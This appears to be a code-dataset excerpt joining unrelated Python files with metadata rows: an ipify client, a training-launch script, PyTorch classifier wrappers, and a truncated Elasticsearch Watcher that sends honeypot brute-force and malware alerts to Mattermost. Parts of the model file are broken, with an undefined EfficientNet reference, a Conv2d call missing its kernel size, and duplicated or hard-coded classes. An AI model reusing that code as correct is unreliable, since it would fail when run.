| 28.542969 | 70 | 0.671274 | 765 | 7,307 | 6.304575 | 0.134641 | 0.099523 | 0.057226 | 0.072154 | 0.790794 | 0.790794 | 0.790794 | 0.790794 | 0.790794 | 0.772548 | 0 | 0.00089 | 0.231422 | 7,307 | 255 | 71 | 28.654902 | 0.857906 | 0.184481 | 0 | 0.770186 | 0 | 0 | 0.036558 | 0.033454 | 0 | 0 | 0 | 0 | 0 | 1 | 0.086957 | false | 0 | 0.037267 | 0 | 0.658385 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 7 |
2f4cde7df77316dc0b7e1f69eb69a7091bf31de9 | 205 | py | Python | bittrex_websocket/__init__.py | slazarov/bittrex-websocket | d2fd7d6ad4de440947ef10aa90d60e307c8f684c | [
"MIT"
] | 122 | 2017-11-25T02:11:22.000Z | 2021-11-22T17:46:11.000Z | bittrex_websocket/__init__.py | slazarov/bittrex-websocket | d2fd7d6ad4de440947ef10aa90d60e307c8f684c | [
"MIT"
] | 83 | 2017-11-29T16:04:40.000Z | 2021-01-31T00:12:33.000Z | bittrex_websocket/__init__.py | slazarov/bittrex-websocket | d2fd7d6ad4de440947ef10aa90d60e307c8f684c | [
"MIT"
] | 51 | 2017-11-28T20:59:14.000Z | 2021-05-27T06:13:11.000Z | from bittrex_websocket import _logger
from bittrex_websocket.websocket_client import BittrexSocket
from bittrex_websocket.order_book import OrderBook
from bittrex_websocket.constants import BittrexMethods
| 41 | 60 | 0.907317 | 25 | 205 | 7.16 | 0.48 | 0.24581 | 0.446927 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.078049 | 205 | 4 | 61 | 51.25 | 0.94709 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
2f74bc65612268f3f0da0cd7a54bd1566c55e52d | 128 | py | Python | src/blizz/check.py | joerg-schneider/blizz | d70ee069b2765a70286f2413f5624c4a2af9af1a | [
"MIT"
] | 5 | 2021-05-28T16:33:03.000Z | 2022-03-26T17:01:38.000Z | src/blizz/check.py | joerg-schneider/blizz | d70ee069b2765a70286f2413f5624c4a2af9af1a | [
"MIT"
] | 1 | 2021-06-01T12:41:56.000Z | 2021-06-03T11:30:51.000Z | src/blizz/check.py | joerg-schneider/blizz | d70ee069b2765a70286f2413f5624c4a2af9af1a | [
"MIT"
] | null | null | null | from blizz._check import types, fields, keys, func, RAISE, WARN
__all__ = ["types", "fields", "keys", "func", "RAISE", "WARN"]
| 32 | 63 | 0.65625 | 17 | 128 | 4.647059 | 0.647059 | 0.278481 | 0.379747 | 0.481013 | 0.708861 | 0.708861 | 0 | 0 | 0 | 0 | 0 | 0 | 0.140625 | 128 | 3 | 64 | 42.666667 | 0.718182 | 0 | 0 | 0 | 0 | 0 | 0.21875 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.5 | 0 | 0.5 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 7 |
2f8765cae27b303b14abbba4b622cafdf8c728b4 | 65 | py | Python | core/modules/optims/__init__.py | FelixFu520/DAO | ac30bad4503408e771bc28c77dd8a20c18c15a05 | [
"MIT"
] | null | null | null | core/modules/optims/__init__.py | FelixFu520/DAO | ac30bad4503408e771bc28c77dd8a20c18c15a05 | [
"MIT"
] | null | null | null | core/modules/optims/__init__.py | FelixFu520/DAO | ac30bad4503408e771bc28c77dd8a20c18c15a05 | [
"MIT"
] | null | null | null | from .sgd_warmup_bias_bn_weight import sgd_warmup_bias_bn_weight
| 32.5 | 64 | 0.923077 | 12 | 65 | 4.333333 | 0.583333 | 0.346154 | 0.5 | 0.576923 | 0.807692 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.061538 | 65 | 1 | 65 | 65 | 0.852459 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 9 |
85e87708e9f88db0246684ceffb066a8e35aef1a | 3,547 | py | Python | includes/ipify.py | z1pti3/jimiPlugin-ipify | 88e83314fd3238e1f753d281aea2567ead07b662 | [
"Apache-2.0"
] | null | null | null | includes/ipify.py | z1pti3/jimiPlugin-ipify | 88e83314fd3238e1f753d281aea2567ead07b662 | [
"Apache-2.0"
] | null | null | null | includes/ipify.py | z1pti3/jimiPlugin-ipify | 88e83314fd3238e1f753d281aea2567ead07b662 | [
"Apache-2.0"
] | null | null | null | import requests
import json
from pathlib import Path
# Gets your currentt ipv4 / ipv6 address
class _ipify():
apiAddress = "https://api64.ipify.org"
def __init__(self, ca=None, requestTimeout=15):
self.requestTimeout = requestTimeout
if ca != None:
if type(ca) is str:
self.ca = str(Path(ca))
elif type(ca) is bool:
self.ca = ca
else:
self.ca = None
def apiCall(self,endpoint,methord="GET",data=None):
kwargs={}
kwargs["timeout"] = self.requestTimeout
if self.ca != None:
kwargs["verify"] = self.ca
try:
url = "{0}/{1}".format(self.apiAddress,endpoint)
if methord == "GET":
response = requests.get(url, **kwargs)
except (requests.exceptions.Timeout, requests.exceptions.ConnectionError) as e:
return 0, "Connection Timeout - {0}".format(e)
return response.status_code, json.loads(response.text)
def getMyIPAddress(self):
statusCode, response = self.apiCall("?format=json")
if statusCode == 200:
return response["ip"]
return None
# Gets IP Geo Infomation
class _geoipify():
apiAddress = "https://geo.ipify.org/api/v1"
def __init__(self, apiToken, ca=None, requestTimeout=15):
self.apiToken = apiToken
self.requestTimeout = requestTimeout
if ca != None:
if type(ca) is str:
self.ca = str(Path(ca))
elif type(ca) is bool:
self.ca = ca
else:
self.ca = None
def apiCall(self,endpoint,methord="GET",data=None):
kwargs={}
kwargs["timeout"] = self.requestTimeout
if self.ca != None:
kwargs["verify"] = self.ca
try:
url = "{0}?apiKey={1}&{2}".format(self.apiAddress,self.apiToken,endpoint)
if methord == "GET":
response = requests.get(url, **kwargs)
except (requests.exceptions.Timeout, requests.exceptions.ConnectionError) as e:
return 0, "Connection Timeout - {0}".format(e)
return response.status_code, json.loads(response.text)
def geoIPLookup(self,ip):
statusCode, response = self.apiCall("ipAddress={0}".format(ip))
return statusCode, response
# Detects proxy, vpn / tor addresses from ip
class _proxyipify():
apiAddress = "https://vpn-proxy-detection.ipify.org/api/v1"
def __init__(self, apiToken, ca=None, requestTimeout=15):
self.apiToken = apiToken
self.requestTimeout = requestTimeout
if ca != None:
if type(ca) is str:
self.ca = str(Path(ca))
elif type(ca) is bool:
self.ca = ca
else:
self.ca = None
def apiCall(self,endpoint,methord="GET",data=None):
kwargs={}
kwargs["timeout"] = self.requestTimeout
if self.ca != None:
kwargs["verify"] = self.ca
try:
url = "{0}?apiKey={1}&{2}".format(self.apiAddress,self.apiToken,endpoint)
if methord == "GET":
response = requests.get(url, **kwargs)
except (requests.exceptions.Timeout, requests.exceptions.ConnectionError) as e:
return 0, "Connection Timeout - {0}".format(e)
return response.status_code, json.loads(response.text)
def proxyDetect(self,ip):
statusCode, response = self.apiCall("ipAddress={0}".format(ip))
return statusCode, response
| 35.118812 | 87 | 0.581618 | 403 | 3,547 | 5.074442 | 0.19603 | 0.046944 | 0.03423 | 0.032274 | 0.806357 | 0.795599 | 0.795599 | 0.795599 | 0.795599 | 0.795599 | 0 | 0.01239 | 0.294615 | 3,547 | 100 | 88 | 35.47 | 0.804956 | 0.029321 | 0 | 0.788235 | 0 | 0 | 0.08927 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.105882 | false | 0 | 0.035294 | 0 | 0.329412 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
85f2299ba588599ddec5e0c6b1686631f6b81de2 | 2,391 | py | Python | auto_training.py | CheungBH/mmsegmentation | 9d72a35ad6d6df499dc6b61eb441b0646f35db18 | [
"Apache-2.0"
] | null | null | null | auto_training.py | CheungBH/mmsegmentation | 9d72a35ad6d6df499dc6b61eb441b0646f35db18 | [
"Apache-2.0"
] | null | null | null | auto_training.py | CheungBH/mmsegmentation | 9d72a35ad6d6df499dc6b61eb441b0646f35db18 | [
"Apache-2.0"
] | null | null | null | import os
configs = [
# "CUDA_VISIBLE_DEVICES=3 ./tools/dist_train.sh configs/ccnet/ccnet_r50-d8_512x512_20k_voc12aug.py 1",
# "CUDA_VISIBLE_DEVICES=3 ./tools/dist_train.sh configs/apcnet/apcnet_r50-d8_512x512_80k_ade20k.py 1",
# "CUDA_VISIBLE_DEVICES=3 ./tools/dist_train.sh configs/ann/ann_r50-d8_512x512_20k_voc12aug.py 1",
# "CUDA_VISIBLE_DEVICES=3 ./tools/dist_train.sh configs/danet/danet_r50-d8_512x512_20k_voc12aug.py 1",
# "CUDA_VISIBLE_DEVICES=3 ./tools/dist_train.sh configs/ccnet/ccnet_r50-d8_512x512_20k_voc12aug.py 1",
# "CUDA_VISIBLE_DEVICES=3 ./tools/dist_train.sh configs/deeplabv3/deeplabv3_r50-d8_512x512_20k_voc12aug.py 1",
# "CUDA_VISIBLE_DEVICES=3 ./tools/dist_train.sh configs/danet/danet_r50-d8_512x1024_40k_cityscapes.py 1",
# "CUDA_VISIBLE_DEVICES=3 ./tools/dist_train.sh configs/dnlnet/dnl_r50-d8_512x1024_40k_cityscapes.py 1",
# "CUDA_VISIBLE_DEVICES=3 ./tools/dist_train.sh configs/emanet/emanet_r50-d8_512x1024_80k_cityscapes.py 1",
# "PORT=13213 CUDA_VISIBLE_DEVICES=2 ./tools/dist_train.sh configs/encnet/encnet_r50-d8_512x512_20k_voc12aug.py 1",
# "PORT=13213 CUDA_VISIBLE_DEVICES=2 ./tools/dist_train.sh configs/encnet/encnet_r50-d8_512x1024_40k_cityscapes.py 1",
# "PORT=13213 CUDA_VISIBLE_DEVICES=2 ./tools/dist_train.sh configs/fastscnn/fast_scnn_4x8_80k_lr0.12_cityscapes.py 1",
# "PORT=13213 CUDA_VISIBLE_DEVICES=2 ./tools/dist_train.sh configs/gcnet/gcnet_r50-d8_512x512_20k_voc12aug.py 1",
# "PORT=13213 CUDA_VISIBLE_DEVICES=2 ./tools/dist_train.sh configs/gcnet/gcnet_r50-d8_512x1024_40k_cityscapes.py 1",
"PORT=12451 CUDA_VISIBLE_DEVICES=0 ./tools/dist_train.sh configs/hrnet/fcn_hr18_480x480_40k_pascal_context.py 1",
"PORT=12451 CUDA_VISIBLE_DEVICES=0 ./tools/dist_train.sh configs/hrnet/fcn_hr18_480x480_40k_pascal_context.py 1",
"PORT=12451 CUDA_VISIBLE_DEVICES=0 ./tools/dist_train.sh configs/nonlocal_net/nonlocal_r50-d8_512x512_20k_voc12aug.py 1",
"PORT=12451 CUDA_VISIBLE_DEVICES=0 ./tools/dist_train.sh configs/nonlocal_net/nonlocal_r50-d8_512x1024_40k_cityscapes.py 1",
"PORT=12451 CUDA_VISIBLE_DEVICES=0 ./tools/dist_train.sh configs/point_rend/pointrend_r50_512x1024_80k_cityscapes.py 1",
]
for idx, cmd in enumerate(configs):
print("--------------------------Training model {}--------------------------".format(idx))
print(cmd)
os.system(cmd) | 77.129032 | 128 | 0.778335 | 384 | 2,391 | 4.484375 | 0.169271 | 0.121371 | 0.198606 | 0.176539 | 0.872822 | 0.852497 | 0.852497 | 0.852497 | 0.835656 | 0.835656 | 0 | 0.145213 | 0.086993 | 2,391 | 31 | 129 | 77.129032 | 0.64361 | 0.626098 | 0 | 0.166667 | 0 | 0.166667 | 0.732955 | 0.639773 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.083333 | 0 | 0.083333 | 0.166667 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 10 |
c08774513db925b9cacb98eff6b1a5b0f1dd7d95 | 14,958 | py | Python | baseline/models/model.py | haymrpig/Pytorch_template | 9a0eda43b2da27807461b305ed42e1bd7c1341dd | [
"MIT"
] | null | null | null | baseline/models/model.py | haymrpig/Pytorch_template | 9a0eda43b2da27807461b305ed42e1bd7c1341dd | [
"MIT"
] | null | null | null | baseline/models/model.py | haymrpig/Pytorch_template | 9a0eda43b2da27807461b305ed42e1bd7c1341dd | [
"MIT"
] | null | null | null | import timm
import torch.nn as nn
import torchvision.models as models
_all_models=["resnet18", "mnasnet1_0", "wide_resnet50_2", "resnext50_32x4d", "mobilenet_v2",
"googlenet", "inception_v3", "densenet161", "squeezenet1_0", "vgg16",
'efficientnet_b0', 'efficientnet_b1', 'efficientnet_b2', 'efficientnet_b3',
'efficientnet_b3_pruned', 'efficientnet_b4', 'efficientnet_b5', 'efficientnet_b6',
'efficientnet_b7', 'efficientnet_b8']
def callModel(model, pretrained=True, num_classes=18, freeze=False):
if model in dir(timm.models):
model = timm.create_model(model, pretrained=pretrained, num_classes=num_classes)
else:
raise ValueError(f'{model} does not exist in timm library')
return model
class resnet18(nn.Module):
def __init__(self, pretrained=True, num_classes=3, freeze=False):
super().__init__()
self.pretrained = pretrained
self.model = models.resnet18(pretrained = self.pretrained)
self.in_features = self.model.fc.in_features
self.model.fc = nn.Linear(self.in_features, num_classes)
self.num_classes = num_classes
def forward(self, x):
x = self.model(x)
return x
class mnasnet1_0(nn.Module):
def __init__(self, pretrained=True, num_classes=3, freeze=False):
super().__init__()
self.pretrained = pretrained
self.model = models.mnasnet1_0(pretrained = self.pretrained)
self.in_features = self.model.classifier[1].out_features
self.num_classes = num_classes
self.layer = nn.Sequential(
nn.ReLU(inplace=True),
nn.Linear(self.in_features, 512),
nn.ReLU(inplace=True),
nn.Linear(512, self.num_classes),
)
def forward(self, x):
x = self.model(x)
x = self.layer(x)
return x
class wide_resnet50_2(nn.Module):
def __init__(self, pretrained=True, num_classes=3, freeze=False):
super().__init__()
self.pretrained = pretrained
self.model = models.wide_resnet50_2(pretrained = self.pretrained)
self.in_features = self.model.fc.out_features
self.num_classes = num_classes
self.layer = nn.Sequential(
nn.ReLU(inplace=True),
nn.Linear(self.in_features, 512),
nn.ReLU(inplace=True),
nn.Linear(512, self.num_classes),
)
def forward(self, x):
x = self.model(x)
x = self.layer(x)
return x
class resnext50_32x4d(nn.Module):
def __init__(self, pretrained=True, num_classes=3, freeze=False):
super().__init__()
self.pretrained = pretrained
self.model = models.resnext50_32x4d(pretrained = self.pretrained)
self.in_features = self.model.fc.out_features
self.num_classes = num_classes
self.layer = nn.Sequential(
nn.ReLU(inplace=True),
nn.Linear(self.in_features, 512),
nn.ReLU(inplace=True),
nn.Linear(512, self.num_classes),
)
def forward(self, x):
x = self.model(x)
x = self.layer(x)
return x
class mobilenet_v2(nn.Module):
def __init__(self, pretrained=True, num_classes=3, freeze=False):
super().__init__()
self.pretrained = pretrained
self.model = models.mobilenet_v2(pretrained = self.pretrained)
self.in_features = self.model.classifier[1].out_features
self.num_classes = num_classes
self.layer = nn.Sequential(
nn.ReLU(inplace=True),
nn.Linear(self.in_features, 512),
nn.ReLU(inplace=True),
nn.Linear(512, self.num_classes),
)
def forward(self, x):
x = self.model(x)
x = self.layer(x)
return x
class googlenet(nn.Module):
def __init__(self, pretrained=True, num_classes=3, freeze=False):
super().__init__()
self.pretrained = pretrained
self.model = models.googlenet(pretrained = self.pretrained)
self.in_features = self.model.fc.out_features
self.num_classes = num_classes
self.layer = nn.Sequential(
nn.ReLU(inplace=True),
nn.Linear(self.in_features, 512),
nn.ReLU(inplace=True),
nn.Linear(512, self.num_classes),
)
def forward(self, x):
x = self.model(x)
x = self.layer(x)
return x
class inception_v3(nn.Module):
def __init__(self, pretrained=True, num_classes=3, freeze=False):
super().__init__()
self.pretrained = pretrained
self.model = models.inception_v3(pretrained = self.pretrained)
self.in_features = self.model.fc.out_features
self.num_classes = num_classes
self.layer = nn.Sequential(
nn.ReLU(inplace=True),
nn.Linear(self.in_features, 512),
nn.ReLU(inplace=True),
nn.Linear(512, self.num_classes),
)
def forward(self, x):
x = self.model(x)
x = self.layer(x)
return x
class densenet161(nn.Module):
def __init__(self, pretrained=True, num_classes=3, freeze=False):
super().__init__()
self.pretrained = pretrained
self.model = models.densenet161(pretrained = self.pretrained)
self.in_features = self.model.classifier.out_features
self.num_classes = num_classes
self.layer = nn.Sequential(
nn.ReLU(inplace=True),
nn.Linear(self.in_features, 512),
nn.ReLU(inplace=True),
nn.Linear(512, self.num_classes),
)
def forward(self, x):
x = self.model(x)
x = self.layer(x)
return x
class squeezenet1_0(nn.Module):
def __init__(self, pretrained=True, num_classes=3, freeze=False):
super().__init__()
self.pretrained = pretrained
self.model = models.squeezenet1_0(pretrained = self.pretrained)
self.in_features = self.model.classifier[1].in_channels
self.num_classes = num_classes
self.model.classifier[1] = nn.Conv2d(self.in_features, num_classes)
def forward(self, x):
x = self.model(x)
return x
class vgg16(nn.Module):
def __init__(self, pretrained=True, num_classes=3, freeze=False):
super().__init__()
self.pretrained = pretrained
self.model = models.vgg16(pretrained = self.pretrained)
self.in_features = self.model.classifier[6].out_features
self.num_classes = num_classes
self.layer = nn.Sequential(
nn.ReLU(inplace=True),
nn.Linear(self.in_features, 512),
nn.ReLU(inplace=True),
nn.Linear(512, self.num_classes),
)
def forward(self, x):
x = self.model(x)
x = self.layer(x)
return x
class squeezenet1_0(nn.Module):
def __init__(self, pretrained=True, num_classes=3, freeze=False):
super().__init__()
self.pretrained = pretrained
self.model = models.squeezenet1_0(pretrained = self.pretrained)
self.in_features = self.model.classifier[1].in_channels
self.num_classes = num_classes
self.model.classifier[1] = nn.Conv2d(self.in_features, num_classes)
def forward(self, x):
x = self.model(x)
return x
class efficientnet_b0(nn.Module):
def __init__(self, pretrained=True, num_classes=3, freeze=False):
super().__init__()
self.pretrained = pretrained
self.model = timm.create_model('efficientnet_b0', num_classes=18, pretrained = self.pretrained)
# self.in_features = self.model.classifier.out_features
# self.num_classes = num_classes
# self.layer = nn.Sequential(
# nn.ReLU(inplace=True),
# nn.Linear(self.in_features, 512),
# nn.ReLU(inplace=True),
# nn.Linear(512, self.num_classes),
# )
def forward(self, x):
x = self.model(x)
#x = self.layer(x)
return x
class efficientnet_b1(nn.Module):
def __init__(self, pretrained=True, num_classes=3, freeze=False):
super().__init__()
self.pretrained = pretrained
self.model = timm.create_model('efficientnet_b1', num_classes=18, pretrained = self.pretrained)
# self.in_features = self.model.classifier.out_features
# self.num_classes = num_classes
# self.layer = nn.Sequential(
# nn.ReLU(inplace=True),
# nn.Linear(self.in_features, 512),
# nn.ReLU(inplace=True),
# nn.Linear(512, self.num_classes),
# )
def forward(self, x):
x = self.model(x)
#x = self.layer(x)
return x
class efficientnet_b2(nn.Module):
def __init__(self, pretrained=True, num_classes=3, freeze=False):
super().__init__()
self.pretrained = pretrained
self.model = timm.create_model('efficientnet_b2', num_classes=num_classes, pretrained = self.pretrained)
# self.in_features = self.model.classifier.out_features
# self.num_classes = num_classes
# self.layer = nn.Sequential(
# nn.ReLU(inplace=True),
# nn.Linear(self.in_features, 512),
# nn.ReLU(inplace=True),
# nn.Linear(512, self.num_classes),
# )
def forward(self, x):
x = self.model(x)
#x = self.layer(x)
return x
class efficientnet_b3(nn.Module):
def __init__(self, pretrained=True, num_classes=3, freeze=False):
super().__init__()
self.pretrained = pretrained
self.model = timm.create_model('efficientnet_b3', num_classes=num_classes, pretrained = self.pretrained)
# self.in_features = self.model.classifier.out_features
# self.num_classes = num_classes
# self.layer = nn.Sequential(
# nn.ReLU(inplace=True),
# nn.Linear(self.in_features, 512),
# nn.ReLU(inplace=True),
# nn.Linear(512, self.num_classes),
# )
def forward(self, x):
x = self.model(x)
#x = self.layer(x)
return x
class efficientnet_b3_pruned(nn.Module):
def __init__(self, pretrained=True, num_classes=3, freeze=False):
super().__init__()
self.pretrained = pretrained
self.model = timm.create_model('efficientnet_b3_pruned', num_classes=num_classes, pretrained = self.pretrained)
def forward(self, x):
x = self.model(x)
return x
class efficientnet_b3_pruned_multihead(nn.Module):
def __init__(self, pretrained=True, num_classes=3, freeze=False):
super().__init__()
self.pretrained = pretrained
self.freeze = freeze
self.model = timm.create_model('efficientnet_b3_pruned', pretrained = self.pretrained)
if self.freeze:
for param in self.model.parameters():
param.requires_grad=False
self.features = self.model.num_features
self.age_layer = timm.models.layers.ClassifierHead(self.features,3)
self.mask_layer = timm.models.layers.ClassifierHead(self.features,3)
self.gender_layer = timm.models.layers.ClassifierHead(self.features,2)
def forward(self, x):
x = self.model.forward_features(x)
age = self.age_layer(x)
mask = self.mask_layer(x)
gender = self.gender_layer(x)
return age, mask, gender
class efficientnet_b4(nn.Module):
def __init__(self, pretrained=True, num_classes=3, freeze=False):
super().__init__()
self.pretrained = pretrained
self.model = timm.create_model('efficientnet_b4', num_classes=num_classes, pretrained = self.pretrained)
# self.in_features = self.model.classifier.out_features
# self.num_classes = num_classes
# self.layer = nn.Sequential(
# nn.ReLU(inplace=True),
# nn.Linear(self.in_features, 512),
# nn.ReLU(inplace=True),
# nn.Linear(512, self.num_classes),
# )
def forward(self, x):
x = self.model(x)
#x = self.layer(x)
return x
class efficientnet_b5(nn.Module):
def __init__(self, pretrained=True, num_classes=3, freeze=False):
super().__init__()
self.pretrained = pretrained
self.model = EfficientNet.from_pretrained("efficientnet-b5")
self.in_features = self.model._fc.in_features
self.num_classes = num_classes
self.model._fc = nn.Linear(self.in_features, num_classes)
# self.layer = nn.Sequential(
# nn.ReLU(inplace=True),
# nn.Linear(self.in_features, 512),
# nn.ReLU(inplace=True),
# nn.Linear(512, self.num_classes),
# )
def forward(self, x):
x = self.model(x)
#x = self.layer(x)
return x
class efficientnet_b6(nn.Module):
def __init__(self, pretrained=True, num_classes=3, freeze=False):
super().__init__()
self.pretrained = pretrained
self.model = timm.create_model('efficientnet_b6', num_classes=num_classes, pretrained = self.pretrained)
# self.in_features = self.model.classifier.out_features
# self.num_classes = num_classes
# self.layer = nn.Sequential(
# nn.ReLU(inplace=True),
# nn.Linear(self.in_features, 512),
# nn.ReLU(inplace=True),
# nn.Linear(512, self.num_classes),
# )
def forward(self, x):
x = self.model(x)
#x = self.layer(x)
return x
class efficientnet_b7(nn.Module):
def __init__(self, pretrained=True, num_classes=3, freeze=False):
super().__init__()
self.pretrained = pretrained
self.model = timm.create_model('efficientnet_b7', num_classes=num_classes, pretrained = self.pretrained)
# self.in_features = self.model.classifier.out_features
# self.num_classes = num_classes
# self.layer = nn.Sequential(
# nn.ReLU(inplace=True),
# nn.Linear(self.in_features, 512),
# nn.ReLU(inplace=True),
# nn.Linear(512, self.num_classes),
# )
def forward(self, x):
x = self.model(x)
#x = self.layer(x)
return x
class efficientnet_b8(nn.Module):
def __init__(self, pretrained=True, num_classes=3, freeze=False):
super().__init__()
self.pretrained = pretrained
self.model = timm.create_model('efficientnet_b8', num_classes=num_classes, pretrained = self.pretrained)
# self.in_features = self.model.classifier.out_features
# self.num_classes = num_classes
# self.layer = nn.Sequential(
# nn.ReLU(inplace=True),
# nn.Linear(self.in_features, 512),
# nn.ReLU(inplace=True),
# nn.Linear(512, self.num_classes),
# )
def forward(self, x):
x = self.model(x)
#x = self.layer(x)
return x
| 35.699284 | 119 | 0.617128 | 1,834 | 14,958 | 4.802072 | 0.050164 | 0.115817 | 0.089928 | 0.06563 | 0.881912 | 0.880777 | 0.880777 | 0.863745 | 0.858067 | 0.828659 | 0 | 0.021927 | 0.265209 | 14,958 | 418 | 120 | 35.784689 | 0.779365 | 0.152494 | 0 | 0.715789 | 0 | 0 | 0.038422 | 0.005239 | 0 | 0 | 0 | 0 | 0 | 1 | 0.157895 | false | 0 | 0.010526 | 0 | 0.326316 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
c08b6e754ff0392ded0450a2f3b96ecef0700391 | 10,992 | py | Python | honeygrove_adapter/es_watcher.py | UHH-ISS/honeygrove-cim | 6cf3f82cdb398c0b67cee9adea3415367f3553b0 | [
"MIT"
] | 2 | 2019-03-12T16:35:27.000Z | 2019-03-21T21:06:58.000Z | honeygrove_adapter/es_watcher.py | UHH-ISS/honeygrove-cim | 6cf3f82cdb398c0b67cee9adea3415367f3553b0 | [
"MIT"
] | null | null | null | honeygrove_adapter/es_watcher.py | UHH-ISS/honeygrove-cim | 6cf3f82cdb398c0b67cee9adea3415367f3553b0 | [
"MIT"
] | null | null | null | from elasticsearch.client.xpack.watcher import WatcherClient
class ESWatcher():
watcher = None
mattermost_url = None
def __init__(self, es, url):
self.watcher = WatcherClient(es)
self.mattermost_url = url
# Watcher alerts
def put_watch(self):
# HTTP brute force alert
self.watcher.put_watch(
id='brute_force_http',
body={
# Run the watch every 10 seconds
'trigger': {'schedule': {'interval': '10s'}},
# The search request to execute
'input': {
'search': {
'request': {
'indices': ['honeygrove'],
'body': {
'query': {
'bool': {
'must': [
{'match': {'service': "HTTP"}},
{'match': {'successful': "false"}}],
'filter': {
'range': {
'@timestamp': {
'from': 'now-10s',
'to': 'now'}}}}}}}}},
# Search for at least 100 logs matching the condition
'condition': {
'compare': {
'ctx.payload.hits.total': {
'gt': 100}}},
# The actions to perform
'actions': {
'mattermost_webhook': {
'webhook': {
'method': 'POST',
'url': self.mattermost_url,
'headers': {
'Content-Type': 'application/json'},
'body': {
'inline': {
'text': ':heavy_exclamation_mark: **HTTP Brute Force Alert:** \n '
'**{{ctx.payload.hits.total}}** **failed login attempts** was/were registered in the last 10 seconds. \n'
'For an overview you can use the visualisations in **Kibana**.'}}}}}})
# FTP brute force alert
self.watcher.put_watch(
id='brute_force_ftp',
body={
# Run the watch every 10 seconds
'trigger': {'schedule': {'interval': '10s'}},
# The search request to execute
'input': {
'search': {
'request': {
'indices': ['honeygrove'],
'body': {
'query': {
'bool': {
'must': [
{'match': {'service': "FTP"}},
{'match': {'successful': "false"}}],
'filter': {
'range': {
'@timestamp': {
'from': 'now-10s',
'to': 'now'}}}}}}}}},
# Search for at least 100 logs matching the condition
'condition': {
'compare': {
'ctx.payload.hits.total': {
'gt': 100}}},
# The actions to perform
'actions': {
'mattermost_webhook': {
'webhook': {
'method': 'POST',
'url': self.mattermost_url,
'headers': {
'Content-Type': 'application/json'},
'body': {
'inline': {
'text': ':heavy_exclamation_mark: **FTP Brute Force Alert:** \n '
'**{{ctx.payload.hits.total}}** **failed login attempts** was/were registered in the last 10 seconds. \n'
'For an overview you can use the visualisations in **Kibana**.'}}}}}})
# SSH brute force alert
self.watcher.put_watch(
id='brute_force_ssh',
body={
# Run the watch every 10 seconds
'trigger': {'schedule': {'interval': '10s'}},
# The search request to execute
'input': {
'search': {
'request': {
'indices': ['honeygrove'],
'body': {
'query': {
'bool': {
'must': [
{'match': {'service': "SSH"}},
{'match': {'successful': "false"}}],
'filter': {
'range': {
'@timestamp': {
'from': 'now-10s',
'to': 'now'}}}}}}}}},
# Search for at least 100 logs matching the condition
'condition': {
'compare': {
'ctx.payload.hits.total': {
'gt': 100}}},
# The actions to perform
'actions': {
'mattermost_webhook': {
'webhook': {
'method': 'POST',
'url': self.mattermost_url,
'headers': {
'Content-Type': 'application/json'},
'body': {
'inline': {
'text': ':heavy_exclamation_mark: **SSH Brute Force Alert:** \n '
'**{{ctx.payload.hits.total}}** **failed login attempts** was/were registered in the last 10 seconds. \n'
'For an overview you can use the visualisations in **Kibana**.'}}}}}})
# Malware alert
self.watcher.put_watch(
id='malware_alerts',
body={
# Run the watch every 10 seconds
'trigger': {'schedule': {'interval': '10s'}},
# The search request to execute
'input': {
'search': {
'request': {
'indices': ['honeygrove'],
'body': {
'query': {
'bool': {
'filter': {
'range': {
'@timestamp': {
'from': 'now-10s',
'to': 'now'}}},
'must': [{
'range': {
'percent': {
'gte': 30,
'lte': 100}}}]}}}}}},
# Search for every log matching the condition
'condition': {
'compare': {
'ctx.payload.hits.total': {
'gt': 0}}},
# The actions to perform
'actions': {
'mattermost_webhook': {
'webhook': {
'method': 'POST',
'url': self.mattermost_url,
'headers': {
